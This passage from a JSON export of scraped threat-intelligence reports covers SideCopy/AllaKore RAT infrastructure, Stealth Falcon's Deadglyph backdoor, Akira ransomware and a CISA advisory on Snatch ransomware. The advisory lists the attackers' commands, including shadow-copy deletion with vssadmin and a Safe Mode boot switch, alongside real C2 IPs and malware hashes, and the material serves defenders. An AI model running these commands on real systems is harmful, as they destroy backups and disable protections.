via separate infrastructure. AllaKore RAT’s capabilities include functionality which allows for keylogging, screenshotting, and remote access of the victim machine, with an ability to also upload stolen information to the C2 server.\n\nWe found two samples of AllaKore RAT, both of which were referenced by QiAnXin.\n\nSample One\nDropped via: f369ee5fc8dcf5a9e95d85dadff5a095a0e3a760 (hta.dll)\nC2: www.kcps[.]edu[.]in\n\nAllaKore RAT: ea844939dc428e6fdb6624d717d0286e4dcae9b1 (simsre.exe)\nC2: 89.117.63.146:9921\n\nSample Two\nDropped via: f369ee5fc8dcf5a9e95d85dadff5a095a0e3a760 (hta.dll)\nC2: www.kcps[.]edu[.]in\n\nAllaKore RAT: 972d85b5736ae8bdf06a9d74f2a3356829ce2095 (sicsmdb.exe)\nC2: 185.229.119.60:9134\n\nExamining threat telemetry data for the two C2 IPs 89.117.63.146 and 185.229.119.60 we observed initial victim connections on 06 January 2023 and 22 February 2023 respectively.\n\nIn total we observed 236 distinct victims, all located in India, connecting to the C2 servers. When compared to the victim numbers for the Action RAT C2s, it could be assessed that AllaKore RAT is deployed more widely and via other means outside of the scope of the infection chain described by QiAnXin.\n\nFurther to this activity we also observed 455 distinct IPs (again all located in India) connecting to 89.117.63.146:7439 and 185.229.119.60:7469 in activity which commenced at the same time as the activity on the ports associated with the AllaKore RAT samples.\n\nWe were unable to identify samples talking to TCP/7439 of 89.117.63.146 and TCP/7469 of 185.229.119.60, however as previously we would hypothesize that this IP was used for C2 communications with another tool associated with SideCopy activities.\n\nConclusion\n\nIn this blog post we have sought to illustrate the following points:\n\nWe have good evidence to demonstrate this particular SideCopy campaign, highlighted first by others in the industry, was successful in targeting Indian users. This finding is based on observations within our threat telemetry data, indicating victim connections to the C2 servers.\nVictim activity predated the public reporting of this campaign, in some cases by several months. This continues to support the statistics about attacker dwell time, and highlights the importance of retrospective analysis of data logs.\nThere is specific evidence to demonstrate that the Action RAT infrastructure, connected to SideCopy, is managed by users accessing the Internet from Pakistan.\nPivots on known threat actor infrastructure can lead to the identification of further, previously unknown infrastructure, in addition to hints at attribution and management.\n\nRecommendations\n\nWe would recommend that cyber defenders, particularly those located in countries / regions which SideCopy operations are known to target, use the IOCs mentioned in this blog to hunt against their own data holdings (including historical logs), and to preemptively block malicious activity.\nUsers of Pure Signal Recon can examine this campaign by querying against the domains and IP addresses referenced in the IOC section below. Further pivots into other currently unknown infrastructure may be possible as this threat actor undertakes future campaigns.\n\nIndicators of Compromise\n\nMalware Hashes (SHA1)\n0d68a135b1f4be18481cf44ed02bcbf82aeb542e\n3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5\n972d85b5736ae8bdf06a9d74f2a3356829ce2095\ncb031561fd76643885671922db7d5b840060334d\nea844939dc428e6fdb6624d717d0286e4dcae9b1\nf369ee5fc8dcf5a9e95d85dadff5a095a0e3a760\nf369ee5fc8dcf5a9e95d85dadff5a095a0e3a760\nfeeadc91373732d65883c8351a6454a77a063ff5\n\nDomains\nwww.cornerstonebeverly[.]org\nwww.kwalityproducts[.]com\nwww.kcps[.]edu[.]in\n\nIP Addresses (with port pairings 🍷)\n144.91.72.17:8080\n144.91.72.17:9468\n185.229.119.60:9134\n66.219.22.252:8080\n66.219.22.252:9467\n84.46.250.78:8080\n89.117.63.146:9921\nThreat Research\n0 comments\nPost not marked as liked\nRecent Posts\nSee All\nTransparent Tribe APT Infrastructure Mapping\n0\nPost not marked as liked\nTransparent Tribe APT Infrastructure Mapping\n0\n1 like. Post not marked as liked\n1\nPRODUCTS\nPure Signal™ Recon\nPure Signal™ Scout\nPure Signal™ Orbit\nIP Reputation Feed\nController Feed\nBotnet Analysis & Reporting\nCOMMUNITY SERVICES\nNimbus Threat Monitor\nUTRS\nBOGON Reference\nCSIRT Assistance Program\nMORE…\nCONTACT US\ntel: +1 847-378-3300\nsales@cymru.com\nFOLLOW US\nSUPPORT\n0900-1700 ET\n1400-2200 UTC\nsupport@cymru.com\nPGP Key\nEmergencies: +1 847-378-3301\nGitHub\n© 2023 Team Cymru. All Rights Reserved.\nGDPR\nPrivacy Policy\nModern Slavery Act\nAccept Cookies\nCookie Settings\nThis site uses cookies essential to its operation, for analytics, and for personalized content and ads. Please read our privacy statement for more information.Privacy statement",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-26T15:06:46.824Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6512f426c12f2c67e0da88a1"
  },
  "name": "Stealth Falcon Deadglyph Backdoor",
  "file_type": null,
  "website_url": "https://www.darkreading.com/dr-global/stealth-falcon-apt-microsoft-homoglyph-attack",
  "website_title": "UAE-Linked 'Stealth Falcon' APT Mimics Microsoft in Homoglyph Attack",
  "file_name": null,
  "file_size": null,
  "content": "NEWSLETTER SIGN-UP\nThe Edge\nDR Tech\nSections\nEvents\nResources\nDR Global\n2 MIN READ\nQUICK HITS\nUAE-Linked 'Stealth Falcon' APT Mimics Microsoft in Homoglyph Attack\nThe cyberattackers are using the \"Deadglyph\" custom spyware, whose full capabilities have not yet been uncovered.\nDark Reading Staff\nDark Reading\nSeptember 25, 2023\nSource: Edo Schmidt via Alamy Stock Photo\nPDF\nResearchers have recently discovered a sophisticated backdoor with unusual architecture, dubbed \"Deadglyph,\" used in a cyber-espionage attack in the Middle East against a government agency. The malware is attributed to the Stealth Falcon advanced persistent threat (APT), a United Arab Emirates (UAE) state-sponsored group.\nIn a routine monitoring of suspicious activities for some of its Middle East high-profile customers, ESET gleaned details on a custom attack that uses homoglyphs, mimicking the name of technology giant Microsoft inside unicode strings. In this case, Cyrillic \"M\" and Greek \"o\" alphabet letters where used in place of the standard Latin characters usually used in English, in the string \"Microsoft Corporation.\"\nThe APT is living up to the \"stealth\" in its name, too. For instance, the Deadglyph malware does not receive traditional backdoor commands from the backdoor binary but instead receives its functions dynamically from a command-and-control (C2) server in the form of modules. These use Windows and custom Executor APIs to enable dozens of capabilities, including loading executables, file operations, token impersonation, and encryption and hashing. This approach means that threat actors can create as many modules as needed in order to customize the attacks.\nIn addition to this, the backdoor employs anti-detection mechanisms such as continuously monitoring system processes as well as implementing randomized network patterns.\nThree out of nine modules have been uncovered — process creator, file reader, and an info collector — indicating that researchers still don't know the full breadth of Deadglyph's capabilities. ESET also discovered a shellcode downloader that could be used to install the malware. \nIn the past, Stealth Falcon (aka Fruity Armor or Project Raven) has been known to target political activists, dissidents, and journalists in the Middle East. This latest attack occurred somewhere in the region of the Anatolian and Arabian peninsulas, according to ESET. The firm also noted that a second sample of the malware was uploaded to Virus Total, from Qatar.\nVulnerabilities/Threats\nThreat Intelligence\nAttacks/Breaches\nMiddle East & Africa\nKeep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.\nSubscribe\nEditors' Choice\nMGM, Caesars Cyberattack Responses Required Brutal Choices\nBecky Bracken, Editor, Dark Reading\nDo CISOs Have to Report Security Flaws to the SEC?\nEvan Schuman, Contributing Writer, Dark Reading\nNFL, CISA Look to Intercept Cyber Threats to Super Bowl LVIII\nTara Seals, Managing Editor, News, Dark Reading\nCisco Moves Into SIEM With $28B Deal to Acquire Splunk\nJeffrey Schwartz, Contributing Writer, Dark Reading\nWebinars\nCyber Risk Assessment Secrets From the Pros\nThe Evolution of the Vulnerability Landscape in 2023\nSecuring Identities in the Cloud\nTips for A Streamlined Transition to Zero Trust\nUsing AI in Application Security Tooling\nMore Webinars\nReports\nThe State of Supply Chain Threats\nWhat Ransomware Groups Look for in Enterprise Victims\nHow to Use Threat Intelligence to Mitigate Third-Party Risk\nEverything You Need to Know About DNS Attacks\nHow Enterprises Are Managing Application Security Risks in a Heightened Threat Environment\nMore Reports\nWhite Papers\nEvaluating SASE for the Work-From-Anywhere Era\nWork From Anywhere Doesn't Have to Be Complicated\n2023 Work-From-Anywhere Global Study\nCybersecurity in a post pandemic world: A focus on financial services\nKnow your customer: Enable a 360-degree view with customer identity & access management\nMore White Papers\nEvents\nBlack Hat Europe - December 4-7 - Learn More\nBlack Hat Middle East and Africa - Nov 14-16 - Learn More\nBlack Hat Japan Trainings - Nov 13-14 - Learn More\nSecTor - Canada's IT Security Conference Oct 23-26 - Learn More\nMore Events\nMore Insights\nWhite Papers\nEvaluating SASE for the Work-From-Anywhere Era\nWork From Anywhere Doesn't Have to Be Complicated\nMore White Papers\nWebinars\nCyber Risk Assessment Secrets From the Pros\nThe Evolution of the Vulnerability Landscape in 2023\nMore Webinars\nReports\nThe State of Supply Chain Threats\nWhat Ransomware Groups Look for in Enterprise Victims\nMore Reports\nDiscover More From Informa Tech\nInformationWeek\nNetwork Computing\nITPro Today\nData Center Knowledge\nBlack Hat\nOmdia\nWorking With Us\nAbout Us\nAdvertise\nReprints\nFollow Dark Reading On Social\nHome\nCookies\nPrivacy\nTerms\nCopyright © 2023 Informa PLC Informa UK Limited is a company registered in England and Wales with company number 1072954 whose registered office is 5 Howick Place, London, SW1P 1WG.",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-26T15:09:26.243Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6512f519c12f2c67e0da88a3"
  },
  "name": "Akira Ransomware Linux Evolution",
  "file_type": null,
  "website_url": "https://www.darkreading.com/attacks-breaches/akira-ransomware-mutates-to-target-linux-systems-adds-ttps",
  "website_title": "Akira Ransomware Mutates to Target Linux Systems",
  "file_name": null,
  "file_size": null,
  "content": "NEWSLETTER SIGN-UP\nThe Edge\nDR Tech\nSections\nEvents\nResources\nAttacks/Breaches\n3 MIN READ\nNEWS\nAkira Ransomware Mutates to Target Linux Systems\nThe newly emerged ransomware actively targets both Windows and Linux systems with a double-extortion approach.\nNathan Eddy\nContributing Writer, Dark Reading\nSeptember 22, 2023\nSource: CSueb via Alamy Stock Photo\nPDF\nArika ransomware has continued to evolve since emerging as a threat in March, expanding its reach from initially targeting Windows systems to include Linux servers and employing a growing array of tactics, techniques, and procedures (TTPs).\nAn in-depth report on Akira from LogPoint breaks down the \"highly sophisticated\" ransomware, which encrypts victim files, deletes shadow copies, and demands ransom payment for data recovery. \nThe infection chain actively targets Cisco ASA VPNs lacking multifactor authentication to exploit the CVE-2023-20269 vulnerability as an entry point.\nAs of early September, the group had successfully hit 110 victims, focusing on targets in the US and the UK.\nBritish quality-assurance company Intertek was a recent high-profile victim; the group has also targeted manufacturing, professional services, and automotive organizations. \nAccording to a recent GuidePoint Security's GRI report, educational organizations have been disproportionately targeted by Akira, representing eight of its 36 observed victims.\nThe ransomware campaign involves multiple malware samples that carry out various steps, including shadow copy deletion, file search, enumeration, and encryption, when executed.\nAkira uses a double-extortion method by stealing personal data, encrypting it, and then extorting money from the victims. If they refuse to pay, the group then threatens to release the data on the Dark Web.\nUpon gaining access, the group uses tools including remote desktop apps AnyDesk and RustDesk and encryption and archiving tool WinRAR.\nAdvanced system information tool and task manager PC Hunter aids the group in laterally moving through the breached systems, along with wmiexc, according to the report.\nThe group can also disable real-time monitoring to evade detection by Windows Defender, and shadow copies are deleted through PowerShell.  \nRansom note files are dropped into the multiple files across the victim's system, which contain payment instructions and decryption assistance.  \nAnish Bogati security research engineer at Logpoint, says Akira's use of Windows internal binary (also known as LOLBAS) for execution, retrieving credentials, evading defense, facilitating lateral movement, and deleting backups and shadow copies, is the group's most concerning TTP.\n\"Windows internal binaries normally won't be monitored by endpoint protection, and they are already present in the system so adversaries don't have to download them into the system,\" he explains.\nBogati adds that the ability to create a task configuration (location of files or folders to be encrypted, determining the percentage of data to be encrypted) can't be overlooked, as it automatically sets up the configuration without manual intervention.\nEnacting Countermeasures\n\"The evolution of multiple malware variants and its capabilities suggest that the threat actors quickly adapt according to trends,\" Bogati notes. \"The Akira group is well-experienced and well-versed in defense capabilities as they abuse Windows internal binary, API, and legitimate software.\"\nHe recommends organizations implement MFA and limit permissions to prevent brute-forcing of credentials, as well as keeping software and systems updated to stay ahead of adversaries constantly exploiting newly discovered vulnerabilities. \nAuditing of privileged accounts and regular security awareness training were among the other recommendations contained in the report. \nThe report also advised network segmentation to isolate critical systems and sensitive data, reducing the risk of breaches and limiting lateral movement by attackers.\nBogati says organizations should also consider blocking unauthorized tunneling and remote access tools, such as Cloudflare ZeroTrust, ZeroTier, and TailScale, which he explains are often used by adversaries to covertly access compromised networks.\nRansomware Landscape Marked by New Actors\nThe gang, named for a 1988 Japanese anime cult classic featuring a psychopathic biker, emerged as a cybercriminal force to be reckoned with in April of this year and is primarily known for attacking Windows systems.\nThe shift by Akira into Linux enterprise environments follows a move by other, more established ransomware — such as Cl0p, Royal, and IceFire ransomware groups — to do the same.\nAkira is among a fresh crop of ransomware actors energized the threat landscape, which has been marked by an emergence of smaller groups and new tactics, while established gangs like LockBit see fewer victims.\nNewer ransomware groups include 8Base, Malas, Rancoz, and BlackSuit, each with its own distinct characteristics and targets.\n\"By looking at their victim count, Akira is likely to become one of the most active threat actors,\" Bogati warns. \"They're developing multiple variants of their malware with various capabilities, and they will not miss any opportunity to exploit unpatched systems.\"\nVulnerabilities/Threats\nThreat Intelligence\nAdvanced Threats\nKeep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.\nSubscribe\nEditors' Choice\nMGM, Caesars Cyberattack Responses Required Brutal Choices\nBecky Bracken, Editor, Dark Reading\nDo CISOs Have to Report Security Flaws to the SEC?\nEvan Schuman, Contributing Writer, Dark Reading\nNFL, CISA Look to Intercept Cyber Threats to Super Bowl LVIII\nTara Seals, Managing Editor, News, Dark Reading\nCisco Moves Into SIEM With $28B Deal to Acquire Splunk\nJeffrey Schwartz, Contributing Writer, Dark Reading\nWebinars\nCyber Risk Assessment Secrets From the Pros\nThe Evolution of the Vulnerability Landscape in 2023\nSecuring Identities in the Cloud\nTips for A Streamlined Transition to Zero Trust\nUsing AI in Application Security Tooling\nMore Webinars\nReports\nThe State of Supply Chain Threats\nWhat Ransomware Groups Look for in Enterprise Victims\nHow to Use Threat Intelligence to Mitigate Third-Party Risk\nEverything You Need to Know About DNS Attacks\nHow Enterprises Are Managing Application Security Risks in a Heightened Threat Environment\nMore Reports\nWhite Papers\nEvaluating SASE for the Work-From-Anywhere Era\nWork From Anywhere Doesn't Have to Be Complicated\n2023 Work-From-Anywhere Global Study\nCybersecurity in a post pandemic world: A focus on financial services\nKnow your customer: Enable a 360-degree view with customer identity & access management\nMore White Papers\nEvents\nBlack Hat Europe - December 4-7 - Learn More\nBlack Hat Middle East and Africa - Nov 14-16 - Learn More\nBlack Hat Japan Trainings - Nov 13-14 - Learn More\nSecTor - Canada's IT Security Conference Oct 23-26 - Learn More\nMore Events\nMore Insights\nWhite Papers\nEvaluating SASE for the Work-From-Anywhere Era\nWork From Anywhere Doesn't Have to Be Complicated\nMore White Papers\nWebinars\nCyber Risk Assessment Secrets From the Pros\nThe Evolution of the Vulnerability Landscape in 2023\nMore Webinars\nReports\nThe State of Supply Chain Threats\nWhat Ransomware Groups Look for in Enterprise Victims\nMore Reports\nDiscover More From Informa Tech\nInformationWeek\nNetwork Computing\nITPro Today\nData Center Knowledge\nBlack Hat\nOmdia\nWorking With Us\nAbout Us\nAdvertise\nReprints\nFollow Dark Reading On Social\nHome\nCookies\nPrivacy\nTerms\nCopyright © 2023 Informa PLC Informa UK Limited is a company registered in England and Wales with company number 1072954 whose registered office is 5 Howick Place, London, SW1P 1WG.",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-26T15:13:29.859Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6512f6dac12f2c67e0da88a7"
  },
  "name": "Snatch Ransomware",
  "file_type": null,
  "website_url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-263a",
  "website_title": "#StopRansomware: Snatch Ransomware | CISA",
  "file_name": null,
  "file_size": null,
  "content": "Skip to main content\nAn official website of the United States government\nHere’s how you know\n\n\nMenu\nBreadcrumb\nHome News & Events Cybersecurity Advisories Cybersecurity Advisory\nSHARE:\nCYBERSECURITY ADVISORY\n#StopRansomware: Snatch Ransomware\nRelease DateSeptember 20, 2023\nAlert CodeAA23-263A\nACTIONS TO TAKE TODAY TO MITIGATE MALICIOUS CYBER ACTIVITY:\nSecure and closely monitor Remote Desktop Protocol (RDP).\nMaintain offline backups of data.\nEnable and enforce phishing-resistant multifactor authentication (MFA).\nSUMMARY\nNote: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.\nThe Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.\nSince mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.\nFBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.\nDownload the PDF version of this report:\nAA23-263A.pdf\n(PDF, 578.71 KB )\nFor a downloadable copy of IOCs, see:\nAA23-263A STIX XML\n(XML, 79.84 KB )\nAA23-263A STIX JSON\n(JSON, 56.10 KB )\nTECHNICAL DETAILS\nNote: This advisory uses the MITRE ATT&CK for Enterprise(link is external) framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool(link is external).\nFirst appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009(link is external)], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running.\nSnatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1(link is external)]\nInitial Access and Persistence\nSnatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133(link is external)] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001(link is external)]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078(link is external)].\nSnatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002(link is external)] and establishing connections over port 443 [T1071.001(link is external)] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003(link is external)]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133(link is external)].\nData Discovery and Lateral Movement\nSnatch threat actors were observed using different TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use sc.exe to configure, query, stop, start, delete, and add system services using the Windows Command line. In addition to sc.exe, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154(link is external)].\nPrior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590(link is external)], moving laterally across the victim’s network with RDP [T1021.001(link is external)] for the largest possible deployment of ransomware and searching for files and folders [T1005(link is external)] for data exfiltration [TA0010(link is external)] followed by file encryption [T1486(link is external)].\nDefense Evasion and Execution\nDuring the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001(link is external)] and run an executable as a file named safe.exe or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters which match the SHA-256 hash of the file in an effort to defeat rule-based detection [T1036(link is external)]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012(link is external)][T1112(link is external)], uses various native Windows tools to enumerate the system [T1569.002(link is external)], finds processes [T1057(link is external)], and creates benign processes to execute Windows batch (.bat) files [T1059.003(link is external)]. In some instances, the program attempts to remove all the volume shadow copies from a system [T1490(link is external)]. After the execution of the batch files, the executable removes the batch files from the victim’s filesystem [T1070.004(link is external)].\nThe Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts—unique to each infection—and leaves behind a text file titled HOW TO RESTORE YOUR FILES.TXT in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems, but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted on the ransomware blog involving the different ransomware variant and on the Snatch threat actors’ extortion blog.\nIndicators of Compromise (IOCs)\nThe Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023.\nEmail Domains and Addresses\nSince 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2:\nTable 1: Malicious Email Domains Observed in Use by Snatch Threat Actors\nEmail Domains\nsezname[.]cz\ncock[.]li\nairmail[.]cc\nTable 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.\nTable 2: Legitimate Email Domains Observed in Use by Snatch Threat Actors\nEmail Domains\ntutanota[.]com / tutamail[.]com / tuta[.]io\nmail[.]fr\nkeemail[.]me\nprotonmail[.]com / proton[.]me\nswisscows[.]email\nThe email addresses listed in Table 3 were reported by recent victims.\nTable 3: Snatch’s Email Addresses Reported by Recent Victims\nEmail Addresses\nsn.tchnews.top@protonmail[.]me(link sends email)\nfunny385@swisscows[.]email(link sends email)\nfunny385@proton[.]me(link sends email)\nrussellrspeck@seznam[.]cz(link sends email)\nrussellrspeck@protonmail[.]com(link sends email)\nMailz13MoraleS@proton[.]me(link sends email)\ndatasto100@tutanota[.]com(link sends email)\nsnatch.vip@protonmail[.]com(link sends email)\nTOX Messaging IDs\nTOX Messaging IDs\nCAB3D74D1DADE95B52928E4D9DFC003FF5ADB2E082F59377D049A91952E8BB3B419DB2FA9D3F\n7229828E766B9058D329B2B4BC0EDDD11612CBCCFA4811532CABC76ACF703074E0D1501F8418\n83E6E3CFEC0E4C8E7F7B6E01F6E86CF70AE8D4E75A59126A2C52FE9F568B4072CA78EF2B3C97\n0FF26770BFAEAD95194506E6970CC1C395B04159038D785DE316F05CE6DE67324C6038727A58\nNOTE: According to ransom notes, this is a “Customer service” TOX to reach out to if the original TOX ID does not respond.\nFolder Creation\nFolder Creation\nC:\\$SysReset\nFilenames with Associated SHA-256 Hashes\nFilenames\nSHA-256\nqesbdksdvnotrjnexutx.bat\n0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f\neqbglqcngblqnl.bat\n1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d\nsafe.exe\n5950b4e27554585123d7fca44e83169375c6001201e3bf26e57d079437e70bcd\nsafe.exe\n7018240d67fd11847c7f9737eaaae45794b37a5c27ffd02beaacaf6ae13352b3\nsafe.exe\n28e82f28d0b9eb6a53d22983e21a9505ada925ebb61382fabebd76b8c4acff7c\nsafe.exe\nfc31043b5f079ce88385883668eeebba76a62f77954a960fb03bf46f47dbb066\nDefenderControl.exe\na201f7f81277e28c0bdd680427b979aee70e42e8a98c67f11e7c83d02f8fe7ae\nPRETTYOCEANApplicationdrs.bi\n6992aaad3c47b938309fc1e6f37179eb51f028536f8afc02e4986312e29220c0\nSetup.exe\n510e9fa38a08d446189c34fe6125295f410b36f00aceb65e7b4508e9d7c4e1d1\nWRSA.exe\ned0fd61bf82660a69f5bfe0e66457cfe56d66dd2b310e9e97657c37779aef65d\nghnhfglwaplf.bat\n2155a029a024a2ffa4eff9108ac15c7db527ca1c8f89ccfd94cc3a70b77cfc57\nnllraq.bat\n251427c578eaa814f07037fbe6e388b3bc86ed3800d7887c9d24e7b94176e30d\nygariiwfenmqteiwcr.bat\n3295f5029f9c9549a584fa13bc6c25520b4ff9a4b2feb1d9e935cc9e4e0f0924\nbsfyqgqeauegwyfvtp.bat\n6c9d8c577dddf9cc480f330617e263a6ee4461651b4dec1f7215bda77df911e7\nrgibdcghzwpk.bat\n84e1476c6b21531de62bbac67e52ab2ac14aa7a30f504ecf33e6b62aa33d1fe5\npxyicmajjlqrtgcnhi.bat\na80c7fe1f88cf24ad4c55910a9f2189f1eedad25d7d0fd53dbfe6bdd68912a84\nevhgpp.bat\nb998a8c15cc19c8c31c89b30f692a40b14d7a6c09233eb976c07f19a84eccb40\neqbglqcngblqnl.bat\n1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d\nqesbdksdvnotrjnexutx.bat\n0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f\nHOW TO RESTORE YOUR FILES.TXT\n  Filenames with Associated SHA-1 Hashes\nFilenames\nSHA-1\nsafe.exe\nc8a0060290715f266c89a21480fed08133ea2614\nCommands Used by Snatch Threat Actors\nCommands\nwmiadap.exe /F /T /R\n%windir%\\System32\\svchost.eve –k WerSvcGroup\nconhost.exe 0xFFFFFFFF -ForceV1\nvssadmin delete shadows /all /quiet\nbcdedit.exe /set {current} safeboot minimal\nREG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\VSS /VE /T REG_SZ /F /D Service\nREG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\mXoRpcSsx /VE /T REG_SZ /F /D Service\nREG QUERY HKLM\\SYSTEM\\CurrentControlSet\\Control /v SystemStartOptions\n%CONHOST% \"1088015358-1778111623-1306428145949291561678876491840500802412316031-33820320\n\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --flag-switches-begin --flag-switches-end --no-startup-window /prefetch:5\ncmd /d /c cmd /d /c cmd /d /c start \" \" C:\\Users\\grade1\\AppData\\Local\\PRETTYOCEANluvApplication\\PRETTYOCEANApplicationidf.bi.\nRegistry Keys\nRegistry Keys\nHKLM\\SOFTWARE\\Microsoft\\Windows Media Player NSS\\3.0\\Servers\\D8B548F0-E306-4B2B-BD82-25DAC3208786\\FriendlyName\nHKU\\S-1-5-21-4270068108-2931534202-3907561125-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions\\Cached\\{ED50FC29-B964-\n48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF\nSystem Log Changes\nSource\nMessage\nTerminalServices-RemoteConnectionManager\nRemote session from client name exceeded the maximum allowed failed logon attempts. The session was forcibly terminated.\nMicrosoft-Windows-Windows Firewall With Advanced Security%4Firewall\nA rule was added (Event 2004) or modified (Event 2005) in the Windows Defender Firewall exception list. All rules included action “Allow” and rule name included “File and Printer Sharing”\nMicrosoft-Windows-Windows Firewall With Advanced Security%4Firewall\nA Windows Defender Firewall setting was changed in private, public, and domain profile with type “Enable Windows Defender Firewall” and value of “no”.\nMicrosoft-Windows-TaskScheduler%4Operational\nInstance of process C:\\Windows\\svchost.exe. (Incorrect file location, should be C:\\Windows\\System32\\svchost.exe)\nMutexes Created\nMutexes Created\n\\Sessions\\1\\BaseNamedObjects\\gcc-shmem-tdm2-fc_key\n\\Sessions\\1\\BaseNamedObjects\\gcc-shmem-tdm2-sjlj_once\n\\Sessions\\1\\BaseNamedObjects\\gcc-shmem-tdm2-use_fc_key\ngcc-shmem-tdm2-fc_key\ngcc-hmem-tdm2-sjlj_once\ngcc-shmem-tdm2-use_fc_key\nMITRE ATT&CK TACTICS AND TECHNIQUES\nSee Tables 4-16 for all referenced threat actor tactics and techniques in this advisory.\nTable 4: Snatch Threat Actors ATT&CK Techniques for Enterprise – Reconnaissance\nTechnique Title\nID\nUse\nGather Victim Network Information\nT1590(link is external)\nSnatch threat actors may gather information about the victim's networks that can be used during targeting.\nTable 5: Snatch Threat Actors ATT&CK Techniques for Enterprise – Resource Development\nTechnique Title\nID\nUse\nAcquire Infrastructure: Virtual Private Server\nT1583.003(link is external)\nSnatch threat actors may rent Virtual Private Servers (VPSs) that can be used during targeting. Snatch threat actors acquire 